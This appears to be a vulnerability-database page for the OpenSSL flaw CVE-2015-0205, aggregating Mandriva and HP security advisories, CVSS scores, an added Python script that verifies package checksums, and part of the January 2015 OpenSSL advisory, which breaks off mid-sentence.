Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners
| VAR-201501-0339 | CVE-2015-0205 | OpenSSL CVE-2015-0205 Man in the Middle Security Bypass Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support. OpenSSL is prone to a security-bypass vulnerability.
Successfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:062
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : openssl
Date : March 27, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities have been discovered and corrected in openssl:
Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL
through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows
remote attackers to inject data across sessions or cause a denial of
service (use-after-free and parsing error) via an SSL connection in
a multithreaded environment (CVE-2010-5298).
The Montgomery ladder implementation in OpenSSL through 1.0.0l does
not ensure that certain swap operations have a constant-time behavior,
which makes it easier for local users to obtain ECDSA nonces via a
FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before
1.0.1g do not properly handle Heartbeat Extension packets, which allows
remote attackers to obtain sensitive information from process memory
via crafted packets that trigger a buffer over-read, as demonstrated
by reading private keys, related to d1_both.c and t1_lib.c, aka the
Heartbleed bug (CVE-2014-0160).
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does
not properly validate fragment lengths in DTLS ClientHello messages,
which allows remote attackers to execute arbitrary code or cause a
denial of service (buffer overflow and application crash) via a long
non-initial fragment (CVE-2014-0195).
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g,
when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a
buffer pointer during certain recursive calls, which allows remote
attackers to cause a denial of service (NULL pointer dereference
and application crash) via vectors that trigger an alert condition
(CVE-2014-0198).
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when
an anonymous ECDH cipher suite is used, allows remote attackers to
cause a denial of service (NULL pointer dereference and client crash)
by triggering a NULL certificate value (CVE-2014-3470).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
products, uses nondeterministic CBC padding, which makes it easier
for man-in-the-middle attackers to obtain cleartext data via a
padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL
0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to
use unsupported protocols, which allows remote attackers to cause a
denial of service (NULL pointer dereference and daemon crash) via
an unexpected handshake, as demonstrated by an SSLv3 handshake to
a no-ssl3 application with certain error handling. NOTE: this issue
became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before
1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square
of a BIGNUM value, which might make it easier for remote attackers to
defeat cryptographic protection mechanisms via unspecified vectors,
related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and
crypto/bn/bn_asm.c (CVE-2014-3570).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k
allows remote attackers to cause a denial of service (NULL pointer
dereference and application crash) via a crafted DTLS message that
is processed with a different read operation for the handshake header
than for the handshake body, related to the dtls1_get_record function
in d1_pkt.c and the ssl3_read_n function in s3_pkt.c (CVE-2014-3571).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote
SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger
a loss of forward secrecy by omitting the ServerKeyExchange message
(CVE-2014-3572).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k
does not enforce certain constraints on certificate data, which allows
remote attackers to defeat a fingerprint-based certificate-blacklist
protection mechanism by including crafted data within a
certificate's unsigned portion, related to crypto/asn1/a_verify.c,
crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c
(CVE-2014-8275).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL
servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate
brute-force decryption by offering a weak ephemeral RSA key in a
noncompliant role, related to the FREAK issue. NOTE: the scope of
this CVE is only client code based on OpenSSL, not EXPORT_RSA issues
associated with servers or other TLS implementations (CVE-2015-0204).
Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL
1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers
to cause a denial of service (memory consumption) by sending many
duplicate records for the next epoch, leading to failure of replay
detection (CVE-2015-0206).
Use-after-free vulnerability in the d2i_ECPrivateKey function in
crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r,
1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote
attackers to cause a denial of service (memory corruption and
application crash) or possibly have unspecified other impact via a
malformed Elliptic Curve (EC) private-key file that is improperly
handled during import (CVE-2015-0209).
The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before
0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before
1.0.2a does not properly perform boolean-type comparisons, which allows
remote attackers to cause a denial of service (invalid read operation
and application crash) via a crafted X.509 certificate to an endpoint
that uses the certificate-verification feature (CVE-2015-0286).
The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL
before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2
before 1.0.2a does not reinitialize CHOICE and ADB data structures,
which might allow attackers to cause a denial of service (invalid
write operation and memory corruption) by leveraging an application
that relies on ASN.1 structure reuse (CVE-2015-0287).
The X509_to_X509_REQ function in crypto/x509/x509_req.c in OpenSSL
before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2
before 1.0.2a might allow attackers to cause a denial of service
(NULL pointer dereference and application crash) via an invalid
certificate key (CVE-2015-0288).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before
1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not
properly handle a lack of outer ContentInfo, which allows attackers to
cause a denial of service (NULL pointer dereference and application
crash) by leveraging an application that processes arbitrary PKCS#7
data and providing malformed data with ASN.1 encoding, related to
crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version where
these security flaws have been fixed.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293
http://openssl.org/news/secadv_20150108.txt
http://openssl.org/news/secadv_20150319.txt
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm
9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm
58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm
b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm
a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm
521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
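The advisory states that MandrivaUpdate and urpmi verify the md5 checksums and GPG signatures of the listed packages automatically. For a practitioner who mirrors packages by hand (or audits a mirror after the fact), the following added example, which is not part of the advisory or of Mandriva's tooling, shows the checksum half of that check: it parses an "Updated Packages:" list in the advisory's "md5 path" format and compares each entry with the file on a local mirror. The package file names follow the advisory's naming, but the file contents, the mirror directory and therefore the hash values are constructed for the example; the advisory's real checksums are not reproduced here.

```python
import hashlib
import os
import re
import tempfile

# One "md5  relative/path" line of an "Updated Packages:" list, as printed in
# Mandriva advisories. Header lines, rules and blank lines do not match.
MANIFEST_LINE = re.compile(r"^([0-9a-fA-F]{32})\s+(\S+)$")


def parse_manifest(text):
    """Map each listed package path to its expected MD5 (lower-case hex)."""
    entries = {}
    for line in text.splitlines():
        m = MANIFEST_LINE.match(line.strip())
        if m:
            entries[m.group(2)] = m.group(1).lower()
    return entries


def md5_of_file(path, chunk_size=64 * 1024):
    """Stream the file through MD5 so large RPMs are not read into memory at once."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def verify_packages(manifest_text, mirror_root):
    """Check every package in the advisory list against a local mirror.

    Returns {path: "ok" | "mismatch" | "missing"}; a mismatch means the file
    on disk is not the one the advisory describes and must not be installed.
    """
    results = {}
    for rel_path, expected in parse_manifest(manifest_text).items():
        local = os.path.join(mirror_root, *rel_path.split("/"))
        if not os.path.isfile(local):
            results[rel_path] = "missing"
        elif md5_of_file(local) == expected:
            results[rel_path] = "ok"
        else:
            results[rel_path] = "mismatch"
    return results


def demo():
    """Constructed mirror: one intact package, one altered, one not downloaded.

    The file names follow the advisory's naming; the contents, and therefore
    the checksums in the manifest, are made up for this example.
    """
    root = tempfile.mkdtemp(prefix="mbs2-mirror-")
    os.makedirs(os.path.join(root, "mbs2", "x86_64"))
    os.makedirs(os.path.join(root, "mbs2", "SRPMS"))

    payload = b"constructed rpm payload for openssl-1.0.1m"
    altered = payload + b" (bytes changed after download)"
    ok_pkg = "mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm"
    bad_pkg = "mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm"
    absent_pkg = "mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm"

    with open(os.path.join(root, *ok_pkg.split("/")), "wb") as fh:
        fh.write(payload)
    with open(os.path.join(root, *bad_pkg.split("/")), "wb") as fh:
        fh.write(altered)  # the manifest below expects the unaltered payload

    expected = hashlib.md5(payload).hexdigest()
    manifest = (
        "Updated Packages:\n"
        "Mandriva Business Server 2/X86_64:\n"
        f"{expected} {ok_pkg}\n"
        f"{expected} {bad_pkg}\n"
        f"{expected} {absent_pkg}\n"
    )
    return verify_packages(manifest, root)


if __name__ == "__main__":
    for path, status in demo().items():
        print(f"{status:8s} {path}")
```

The checksum comparison only tells you that the file you have is the one the advisory lists; it does not establish who published it, and MD5 is no longer collision-resistant. Authenticity rests on the GPG signature the advisory mentions, verified against the Mandriva Security Team key (0x22458A98) fetched as shown above, which urpmi does for you.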
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS
kz0ex6eI6hA6qSwklA2NoXY=
=GYjX
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04774019
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04774019
Version: 1
HPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-08-24
Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized
access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Matrix
Operating Environment. The vulnerabilities could be exploited remotely
resulting in unauthorized modification, unauthorized access, or unauthorized
disclosure of information.
References:
CVE-2010-5107
CVE-2013-0248
CVE-2014-0118
CVE-2014-0226
CVE-2014-0231
CVE-2014-1692
CVE-2014-3523
CVE-2014-3569
CVE-2014-3570
CVE-2014-3571
CVE-2014-3572
CVE-2014-8142
CVE-2014-8275
CVE-2014-9427
CVE-2014-9652
CVE-2014-9653
CVE-2014-9705
CVE-2015-0204
CVE-2015-0205
CVE-2015-0206
CVE-2015-0207
CVE-2015-0208
CVE-2015-0209
CVE-2015-0231
CVE-2015-0232
CVE-2015-0273
CVE-2015-0285
CVE-2015-0286
CVE-2015-0287
CVE-2015-0288
CVE-2015-0289
CVE-2015-0290
CVE-2015-0291
CVE-2015-0292
CVE-2015-0293
CVE-2015-1787
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
CVE-2015-2134
CVE-2015-2139
CVE-2015-2140
CVE-2015-2301
CVE-2015-2331
CVE-2015-2348
CVE-2015-2787
CVE-2015-3113
CVE-2015-5122
CVE-2015-5123
CVE-2015-5402
CVE-2015-5403
CVE-2015-5404
CVE-2015-5405
CVE-2015-5427
CVE-2015-5428
CVE-2015-5429
CVE-2015-5430
CVE-2015-5431
CVE-2015-5432
CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0
HP System Management Homepage (SMH) prior to version 7.5.0
HP Version Control Agent (VCA) prior to version 7.5.0
HP Version Control Repository Manager (VCRM) prior to version 7.5.0
HP Insight Orchestration prior to version 7.5.0
HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3
CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6
CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9
CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the
vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order
the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO
from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management
Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from
the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components
bundled with the HP Matrix Operating Environment in the following HP Security
Bulletins.
HP Matrix Operating Environment component / HP Security Bulletin Number / Security Bulletin Location
HP Systems Insight Manager (SIM): HPSBMU03394
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH): HPSBMU03380
http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&lang=en-us&cc=
HP Version Control Agent (VCA): HPSBMU03397
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM): HPSBMU03396
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK: HPSBMU03413
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04774021
HISTORY
Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
References:
CVE-2014-0118 - Remote Denial of Service (DoS)
CVE-2014-0226 - Remote Denial of Service (DoS)
CVE-2014-0231 - Remote Denial of Service (DoS)
CVE-2014-3523 - Remote Denial of Service (DoS)
CVE-2014-3569 - Remote Denial of Service (DoS)
CVE-2014-3570 - Remote Disclosure of Information
CVE-2014-3571 - Remote Denial of Service (DoS)
CVE-2014-3572 - Remote Disclosure of Information
CVE-2014-8142 - Remote Code Execution
CVE-2014-8275 - Unauthorized Modification
CVE-2014-9427 - Remote Disclosure of Information
CVE-2014-9652 - Remote Denial of Service (DoS)
CVE-2014-9653 - Remote Denial of Service (DoS)
CVE-2014-9705 - Remote Code Execution
CVE-2015-0204 - Remote Disclosure of Information
CVE-2015-0205 - Remote Unauthorized Access
CVE-2015-0206 - Remote Denial of Service (DoS)
CVE-2015-0207 - Remote Denial of Service (DoS)
CVE-2015-0208 - Remote Denial of Service (DoS)
CVE-2015-0209 - Remote Denial of Service (DoS)
CVE-2015-0231 - Remote Denial of Service (DoS)
CVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code
CVE-2015-0273 - Remote Execution of Arbitrary Code
CVE-2015-0285 - Remote Disclosure of Information
CVE-2015-0286 - Remote Denial of Service (DoS)
CVE-2015-0287 - Remote Denial of Service (DoS)
CVE-2015-0288 - Remote Denial of Service (DoS)
CVE-2015-0289 - Remote Denial of Service (DoS)
CVE-2015-0290 - Remote Denial of Service (DoS)
CVE-2015-0291 - Remote Denial of Service (DoS)
CVE-2015-0292 - Remote Denial of Service (DoS)
CVE-2015-0293 - Remote Denial of Service (DoS)
CVE-2015-1787 - Remote Denial of Service (DoS)
CVE-2015-2301 - Remote Execution of Arbitrary Code
CVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code
CVE-2015-2348 - Unauthorized Modification
CVE-2015-2787 - Remote Execution of Arbitrary Code
CVE-2015-2134 - Cross-site Request Forgery (CSRF)
SSRT102109
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
OpenSSL Security Advisory [08 Jan 2015]
=======================================
DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)
===========================================================
Severity: Moderate
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due
to a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of
Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL
core team.
DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)
=======================================================
Severity: Moderate
A memory leak can occur in the dtls1_buffer_record function under certain
conditions. In particular this could occur if an attacker sent repeated DTLS
records with the same sequence number but for the next epoch. The memory leak
could be exploited by an attacker in a Denial of Service attack through memory
exhaustion.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also
provided an initial patch. Further analysis was performed by Matt Caswell of the
OpenSSL development team, who also developed the final patch.
no-ssl3 configuration sets method to NULL (CVE-2014-3569)
=========================================================
Severity: Low
When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is
received the ssl method would be set to NULL which could later result in
a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The
fix was developed by Kurt Roeckx.
ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)
==========================================================
Severity: Low
An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite
using an ECDSA certificate if the server key exchange message is omitted. This
effectively removes forward secrecy from the ciphersuite.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
==============================================================
Severity: Low
An OpenSSL client will accept the use of an RSA temporary key in a non-export
